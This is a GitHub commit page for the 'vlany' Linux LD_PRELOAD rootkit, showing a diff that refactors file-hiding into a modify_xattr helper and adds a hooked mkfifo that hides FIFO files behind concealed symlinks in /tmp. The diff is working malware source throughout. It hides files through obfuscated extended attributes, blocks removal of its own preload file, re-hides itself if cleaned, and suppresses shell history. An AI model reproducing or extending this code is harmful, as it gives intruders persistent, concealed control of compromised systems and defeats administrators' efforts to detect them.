Skip to content

Commit

Permalink
Browse files Browse the repository at this point in the history
mkfifo redirect & symlink hide
  • Loading branch information
mempodippy committed Aug 23, 2017
1 parent ed588fa commit c052deb
Show file tree
Hide file tree
Showing 8 changed files with 119 additions and 57 deletions.
3 changes: 3 additions & 0 deletions config.py
Expand Up @@ -247,6 +247,9 @@ def const_h_setup():
const_h += '#define X_USAGE "' + xor("Usage: %s [pw] [%s] [pkg name]\n") + '"\n' # template string used for snprintf in busage function
const_h += '#define E_SMSG "' + xor("%s FINISHED AND MAGIC_GID RESET. \033[1;32mWE'RE HIDDEN AGAIN\033[0m\n") + '"\n' # message used after successful command executions
const_h += '#define GID_SET "' + xor("SETTING GID TO 0\n") + '"\n'
const_h += '#define FIFO_ERR "' + xor("Couldn't create new FIFO file.\n") + '"\n'
const_h += '#define LN_ERR "' + xor("Couldn't create symlink to %s.\n") + '"\n'
const_h += '#define X_ERR "' + xor("Couldn't assign hidden extended attributes to FIFO link.\n") + '"\n'

const_h += '#define XATTR "' + xor("user.%s") + '"\n'

Expand Down
3 changes: 1 addition & 2 deletions install.sh
Expand Up @@ -357,9 +357,8 @@ if [ "$1" == "--cli" ]; then
compile_vlany
echo "Rootkit libraries compiled."
sleep 2
exit

[ $STATUS == "compile" ] && { rm -rf *.o bashrc shell_msg bd_readme; exit; }
[ $STATUS == "compile" ] && { rm -rf *.o magic_gid bashrc shell_msg bd_readme; exit; }

echo "Installing vlany."
sleep 1
Expand Down
42 changes: 5 additions & 37 deletions symbols/exec/execve.c
Expand Up @@ -59,27 +59,10 @@ int execve(const char *filename, char *const argv[], char *const envp[])
CLEAN(unhide_usage); exit(0);
}

char *target_file = argv[2];
char *install = strdup(INSTALL); xor(install);
char *ld_preload_etc = strdup(LD_PRELOAD_ETC); xor(ld_preload_etc);
if((strstr(target_file, install) || strstr(target_file, ld_preload_etc)) && hidden_xattr(target_file)) { CLEAN(ld_preload_etc); CLEAN(install); exit(0); } // ok just exit.. no threats to your life
CLEAN(ld_preload_etc); CLEAN(install);

char *xattr = strdup(XATTR), xattr_user[256];
char *hidden_xattr_1_str = strdup(HIDDEN_XATTR_1_STR);

xor(hidden_xattr_1_str); xor(xattr);
snprintf(xattr_user, sizeof(xattr_user), xattr, hidden_xattr_1_str); // create user.blahblahblah attribute to hide the file
CLEAN(xattr); CLEAN(hidden_xattr_1_str);

HOOK(old_removexattr, CREMOVEXATTR);
int ret = old_removexattr(target_file, xattr_user);

if(ret < 0 && errno == ENOENT) { printf("File %s does not exist.\n", target_file); exit(0); } // invalid path
if(ret < 0 && errno == ENODATA) { printf("File %s isn't hidden.\n", target_file); exit(0); } // visible file
if(modify_xattr(argv[2], 2) < 0) { printf("File %s does not exist or is already unhidden.\n", argv[2]); exit(0); }

char *unhide_success = strdup(UNHIDE_SUCCESS); xor(unhide_success);
printf(unhide_success, target_file);
printf(unhide_success, argv[2]);
CLEAN(unhide_success); exit(0);
}
CLEAN(unhide_file);
Expand All @@ -95,25 +78,10 @@ int execve(const char *filename, char *const argv[], char *const envp[])
CLEAN(hide_usage); exit(0);
}

char *target_file = argv[2], xattr_user[256];
char *hidden_xattr_1_str = strdup(HIDDEN_XATTR_1_STR);
char *hidden_xattr_2_str = strdup(HIDDEN_XATTR_2_STR);
char *xattr = strdup(XATTR);

xor(hidden_xattr_1_str); xor(xattr);
snprintf(xattr_user, sizeof(xattr_user), xattr, hidden_xattr_1_str);
CLEAN(xattr); CLEAN(hidden_xattr_1_str);

xor(hidden_xattr_2_str);
HOOK(old_setxattr, CSETXATTR);
int ret = old_setxattr(target_file, xattr_user, hidden_xattr_2_str, strlen(hidden_xattr_2_str), XATTR_CREATE);
CLEAN(hidden_xattr_2_str);

if(ret < 0 && errno == ENOENT) { printf("File %s does not exist.\n", target_file); exit(0); } // invalid path
if(ret < 0 && errno == EEXIST) { printf("File %s is already hidden.\n", target_file); exit(0); } // file already hidden
if(modify_xattr(argv[2], 1) < 0) { printf("File %s does not exist or is already hidden.\n", argv[2]); exit(0); } // file already hidden

char *hide_success = strdup(HIDE_SUCCESS); xor(hide_success);
printf(hide_success, target_file);
printf(hide_success, argv[2]);
CLEAN(hide_success); exit(0);
}
CLEAN(hide_file);
Expand Down Expand Up @@ -158,7 +126,7 @@ int execve(const char *filename, char *const argv[], char *const envp[])
char *ld_so_path = strdup(LD_SO_PATH); xor(ld_so_path);

char *ld_preload = strdup(LD_PRELOAD); xor(ld_preload);

if(!fnmatch(ld_linux_so_path, filename, FNM_PATHNAME) || !fnmatch(ld_so_path, filename, FNM_PATHNAME))
{
for(i = 0; argv[i] != NULL; i++)
Expand Down
55 changes: 51 additions & 4 deletions symbols/hiding/mkfifo.c
@@ -1,3 +1,12 @@
// since we can't apply extended attributes to special FIFO files,
// we intercept the call and drop the FIFO file in /tmp/ as a hidden file (regular files starting with ".")
// then create a symlink to the new FIFO file where mkfifo was originally going to create it's FIFO file.
// the new FIFO files are stil visible to regular users if they ls -a /tmp,
// but the symlinks are hidden so they won't show up in /run/screens/S-*/

// TODO:
// - add cleanup function (remove FIFO file and symlink)

int mkfifo(const char *pathname, mode_t mode)
{
#ifdef DEBUG
Expand All @@ -7,11 +16,49 @@ int mkfifo(const char *pathname, mode_t mode)
HOOK(old_mkfifo, CMKFIFO);
if(owned())
{
// mkfifo(*some obscure random absolute path*, mode)
// mkfifo(*different, temporary file*, mode)
// use char *pathname to create symbolic link to new fifo file
// hide symbolic link instead
errno = EROFS;
return -1;
// hide symbolic link

char buf[128], fname[256], loc[] = "/tmp/.XXXXXX";

// use mkstemp to generate a random file name for the FIFO file
int tmp = mkstemp(loc);
if(tmp < 0) return -1;
// get absolute path of our new temp file from the fd given
snprintf(buf, sizeof(buf), "/proc/self/fd/%d", tmp);
readlink(buf, fname, sizeof(fname));
// now we need to remove the temp file we created. thats ok since we have the path in memory
HOOK(old_unlink, CUNLINK); old_unlink(fname);

// create a FIFO file in place of where our temp file was. path can't already exist,
// hence earlier unlink
if(old_mkfifo(fname, mode) < 0)
{
char *fifo_err = strdup(FIFO_ERR); xor(fifo_err);
printf("%s", fifo_err); CLEAN(fifo_err);
return -1;
} // new fifo file should now be created, now we can link it
// to the original designated path

HOOK(old_symlink, CSYMLINK);
if(old_symlink(fname, pathname) < 0) // create link to our FIFO file
{
char *ln_err = strdup(LN_ERR); xor(ln_err);
printf(ln_err, pathname); CLEAN(ln_err);
return -1;
} // now we need to hide the link so regular users can't see it

if(modify_xattr(pathname, 1) < 0) // hide our new link to the FIFO file
{
char *x_err = strdup(X_ERR); xor(x_err);
printf(x_err, pathname); CLEAN(x_err);
return -1;
}

// return success value as if everything worked normally
return 0;
}

return old_mkfifo(pathname, mode);
}
14 changes: 1 addition & 13 deletions symbols/hiding/reinstall.c
Expand Up @@ -41,19 +41,7 @@ void reinstall(void)
}

// the preload file was removed somehow, now we need to hide it again
char xattr_user[256];
char *hidden_xattr_1_str = strdup(HIDDEN_XATTR_1_STR);
char *hidden_xattr_2_str = strdup(HIDDEN_XATTR_2_STR);
char *xattr = strdup(XATTR);

xor(hidden_xattr_1_str); xor(xattr);
snprintf(xattr_user, sizeof(xattr_user), xattr, hidden_xattr_1_str);
CLEAN(xattr); CLEAN(hidden_xattr_1_str);

xor(hidden_xattr_2_str);
HOOK(old_setxattr, CSETXATTR);
old_setxattr(ld_preload, xattr_user, hidden_xattr_2_str, strlen(hidden_xattr_2_str), XATTR_CREATE); // no need to check for a return value
CLEAN(hidden_xattr_2_str);
modify_xattr(ld_preload, 1); // we good.
}
CLEAN(lib_location);
CLEAN(ld_preload);
Expand Down
56 changes: 56 additions & 0 deletions symbols/util/modify_xattr.c
@@ -0,0 +1,56 @@
int modify_xattr(const char *path, int mode)
{
#ifdef DEBUG
printf("[vlany] attempting to modify file %s\n", path);
#endif

if(mode != 1 && mode != 2) return -1; // invalid mode

if(mode == 1) // hide file
{
#ifdef DEBUG
printf("[vlany] hiding file %s\n", path);
#endif

char xattr_user[256];
char *hidden_xattr_1_str = strdup(HIDDEN_XATTR_1_STR); xor(hidden_xattr_1_str);
char *hidden_xattr_2_str = strdup(HIDDEN_XATTR_2_STR); xor(hidden_xattr_2_str);
char *xattr = strdup(XATTR); xor(xattr);

snprintf(xattr_user, sizeof(xattr_user), xattr, hidden_xattr_1_str);
CLEAN(xattr); CLEAN(hidden_xattr_1_str);

HOOK(old_setxattr, CSETXATTR);
int ret = old_setxattr(path, xattr_user, hidden_xattr_2_str, strlen(hidden_xattr_2_str), XATTR_CREATE);
CLEAN(hidden_xattr_2_str);

return ret;
}

if(mode == 2) // unhide file
{
#ifdef DEBUG
printf("[vlany] unhiding file %s\n", path);
#endif

// prevent removal of install dir or new ld.so.preload
char *install = strdup(INSTALL); xor(install);
char *ld_preload_etc = strdup(LD_PRELOAD_ETC); xor(ld_preload_etc);
if(strstr(path, install) || strstr(path, ld_preload_etc)) { CLEAN(install); CLEAN(ld_preload_etc); return -1; }
CLEAN(ld_preload_etc); CLEAN(install);

char xattr_user[256];
char *xattr = strdup(XATTR); xor(xattr);
char *hidden_xattr_1_str = strdup(HIDDEN_XATTR_1_STR); xor(hidden_xattr_1_str);

snprintf(xattr_user, sizeof(xattr_user), xattr, hidden_xattr_1_str);
CLEAN(xattr); CLEAN(hidden_xattr_1_str);

HOOK(old_removexattr, CREMOVEXATTR);
int ret = old_removexattr(path, xattr_user);

return ret;
}

return -1; // nothing was accomplished
}
2 changes: 1 addition & 1 deletion symbols/util/owned.c
Expand Up @@ -32,7 +32,7 @@ int owned(void)

char _histfile[256], *histfile = strdup(HISTFILE); xor(histfile);
unsetenv("HISTFILE");
snprintf(_histfile, sizeof(histfile), "HISTFILE=%s", histfile);
snprintf(_histfile, sizeof(_histfile), "HISTFILE=%s", histfile);
putenv(_histfile);
CLEAN(histfile);

Expand Down
1 change: 1 addition & 0 deletions vlany.c
Expand Up @@ -47,6 +47,7 @@
#include "symbols/hiding/libdl/dlsym.c" // (void *dlsym(), void locate_dlsym(), void *locate_sym())
#include "symbols/util/dup.c" // (char *dup_call())
#include "symbols/util/procname.h" // (char *procname_self())
#include "symbols/util/modify_xattr.c" // (int modify_xattr(char *path, int mode)
#include "symbols/hiding/reinstall.c" // (void reinstall(), int hide_vlany())
#include "symbols/hiding/hide_checks.c" // (int hidden_xattr(), int hidden(), int hiddenGID(), int hiddenDirectory())
#include "symbols/hiding/forge_proc_net.c" // (FILE *forge_proc_net_tcp())
Expand Down

0 comments on commit c052deb

Please sign in to comment.